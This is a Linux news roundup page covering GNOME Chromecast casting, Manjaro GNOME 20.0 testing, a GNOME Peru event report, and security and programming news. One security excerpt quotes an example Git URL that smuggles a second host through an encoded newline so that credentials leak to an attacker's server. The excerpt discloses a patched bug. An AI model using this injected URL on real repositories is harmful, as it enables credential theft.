GNOME Desktop: Cast to TV, Manjaro Linux and GNOME PERU

Submitted by Roy Schestowitz on Monday 20th of April 2020 04:13:22 PM
GNOME
  • How To Cast Your GNOME Shell Desktop To A Chromecast (With Audio, Wayland / X11 Support) Using Cast to TV

    Cast to TV, a GNOME Shell extension to cast files and more to Chromecast devices (and more), was updated recently with support for casting your desktop, with sound, which works with both Wayland and X11. This is done with the help of a helper add-on called Cast to TV - Desktop Stream Add-on, which recently had its first release on the GNOME extensions website.

    For desktop streaming to work, you need Cast to TV version 14 or newer, which only supports GNOME Shell 3.36 and 3.34 (Ubuntu 20.04 and 19.10, and Fedora 31 and 32 for example). This means that this isn't available for older Linux distributions that use older GNOME Shell versions, like Ubuntu 18.04 or Fedora 30.

  • Manjaro needs testers for the upcoming Manjaro GNOME 20.0 release - Snap and Flatpak support OOTB

    Manjaro Linux is getting ready for their major release, and they're looking for your help to make sure the GNOME edition for Manjaro GNOME 20.0 is as smooth as possible.

    Announced here, there's a huge amount of new features coming. The thing is though, unlike other distributions like Ubuntu, Manjaro is a rolling-release where they regularly put out full upgrades for anyone who has it installed. These big new releases like Manjaro GNOME 20.0 are mainly a refresh of the download and installer for new installs. Important to do of course, just like any other Linux distributions, they need a good out of the box experience

  • Julita Inca: Report of GNOME PERU FEST 2020

    The idea was gathering all the Peruvian GNOME lovers to share our experiences with GNOME throughout all the past ten years to all our viewers around the world.

    Jose Quiñones (juazisco) is currently a chief in the IT area of the Health Public sector in Peru. He has been previously involved in the initiative GNOME PERU Challenge 2017-1

    Fabian Orccón (cfoch) is a member of the GNOME Foundation, GSoC mentor and ex-GSoC student. He also supported GNOME Peru events such as HACKCAMP 2016.

    Martin Vuelta (zodiafireworks) is a FLOSS enthusiastic person who helped me in organizing previous GNOME events such as Linux Playa, LinuxAtUNI and PeruRumboGSoC2018.

    Alex Aragón (aragcar) has been a designer for many FLOSS events I have organized for years. He participated in the LinuxCamp2012. One of the first designs he did here.

    Fiorella Effio (aweba) is a Frontend developer who has also participated in several GNOME events in Peru since 2016. She wrote most of her experiences with GNOME here.

    Angelou Alexander (aggalex) is a student from Greece, and our only international guest. We have met in the GUADEC 2019 and we did together a workshop at FOSSCOMM 2019.

Want to Ditch Zoom? Jitsi Offers an Open-Source Alternative

[Tutorial] LibreOffice Calc Reference to Another External Sheet or Workbook

When you are working with multiple workbooks or worksheets, it is often needed to refer back or retrieve data from different workbooks into the current workbook. This helps to keep your work modular and less complex. In LibreOffice Calc, you can achieve it using an external reference. Read more

Security and Proprietary Issues

  • Bitcoin stealer infected 700+ libraries of major programming language

    A cybersecurity firm discovered that over 700 libraries of the popular programming language, Ruby, contained malicious Bitcoin-stealing software. ReversingLabs, based in Cambridge, Massachusetts, disclosed its findings in a blog post on Thursday. Back in February, it wrote, hackers placed malicious files inside a package manager called RubyGems—which is usually used to upload and share improvements on existing pieces of software. The hackers were trying to trick developers into downloading malware by using a method called “typosquatting”, which consists of uploading malicious packages with similar names to regular ones. By just changing a few characters of a file name, the hope was that a developer would mistakenly download an infected package—unwittingly providing the hacker with access to their system.

  • Find the Sweet Spot: Open Source Software, Military Systems and Cybersecurity
  • This Week In Security: Git, Patch Tuesday, Anti-Cheat, And Vulnerable Documentation

    Git released an update on Tuesday, fixing an issue that could result in leaking credentials. The vulnerability was in how Git handles an HTTP URL containing a newline. Looking at the commits in 2.26.1, we can find an example of an attack: url = "https://one.example.com?%0ahost=two.example.com/foo.git" So doing a git pull against this repository will connect your git instance to an attacker’s server, but using the credentials from an arbitrary server. It seems like this could potentially be used to steal Github credentials, for instance. So go make sure you have an updated Git client.

  • Alibaba to Invest $28 Billion Over Three Years in Cloud

    The Chinese e-commerce giant plans to build more datacenters to complement an existing network covering 21 regions around the world, the company said in a statement. It will continue to develop its own technologies in areas such as AI-inference chips to support that expansion in cloud services, it added.

  • Hospitals brace for increase in cyberattacks

    As hospitals face a surge in patients and critical equipment shortages stemming from the coronavirus pandemic, they are increasingly becoming the target of [attackers] who see health care facilities as easy prey.

    Ransomware attacks, in which [attackers] lock up a network and demand payment to return access to these systems, have presented a growing threat to hospitals since January.

    Experts are warning that they expect these attacks to increase and that the threat has captured the attention of top intelligence lawmakers, who warn the outbreak and the ransomware attacks create the perfect storm.

  • CDC plans to roll out app in May to speed up COVID-19 case reporting

    The Centers for Disease Control and Prevention (CDC) plans to roll out an app in May that will accelerate electronic case reporting of COVID-19 cases.

    The app, based on Fast Healthcare Interoperability Resources (FHIR) standards, can be implemented quickly to automate COVID case reporting, said Laura Conn, health scientist and eCR lead in the CDC's Center for Surveillance, Epidemiology, and Laboratory Services.

    The app enables healthcare providers that don't have the capability to automatically send case reports from their health IT systems to more efficiently send data to public health agencies.

  • Judge dismisses Twitter lawsuit pushing to reveal US surveillance requests

    Rogers clarified that the government’s use of confidential declarations convinced her that unearthing the exact number of national security letters dating back to 2014, as requested by Twitter, would put national security at risk.

Programming and Open Hardware Leftovers

  • The [Perl] Weekly Challenge #056

    Before I say anything about my contributions, I would like to share my sweet encounter with Raku. Last week while working on the task Flip Binary using Raku, I was struggling to figure out all the binary strings with maximum 1s. I had the results in a Hash where key was the binary string and value was the total count of 1s in it. The idea was to sort the Hash by values first then sort by keys. After posting the question on the Twitter handle @PerlWChallenge, I received the below solution by PawgChamp (@Mrofnet).

  • Dirk Eddelbuettel: prrd 0.0.3: More improvements

    Back in early 2018, the prrd package was introduced as release 0.0.1, uploaded to CRAN, and updated once as release 0.0.2. I have used it extensively for every CRAN release of Rcpp, RcppArmadillo, RcppEigen, BH, and possibly others.

  • Introduction to jQuery – Learn jQuery

    Modern web application development is incomplete without learning jQuery. Almost all of us have heard of it at some point while browsing the Internet. In this series of articles, we will learn jQuery, the most popular Javascript framework. At the end of the series, we will build multiple projects to better understand jQuery. In this article, we will talk about what jQuery is. How it works. Why prefer jQuery over Javascript. Before we move on to discussing how to install jQuery and other advanced topics, let us talk about some basics of jQuery such as, what is jQuery?

  • Getting Started with Qoitech Otii Developer Tool using ESP8266 and Raspberry Pi 4 Boards

    Last month, I received Qoitech Otii Arc power supply, power meter, and DAQ unit that aims at helping hardware and software engineers develop energy-efficient products. I’ve now had time to test the unit with an ESP8266 board and Raspberry Pi 4 SBC, so I’ll show how to get started and my overall experience with the hardware and program.

  • Best Arduino Starter Kits

    When you start out with Arduino, you have a vast selection of choices. This may be confusing. To make it easier, start by thinking what you want your first project should do for you. The different packages have more or less components. Motors and servos, sensors and LEDs are usually included but not always. Arduino is many boards, based on micro controllers from ATmega. Since Arduino is open source, there are also many other manufacturers that do the same. The best way to start is to use a starter kit with the UNO v3 board. There are many others, but this one is easy to get started with and cheap.

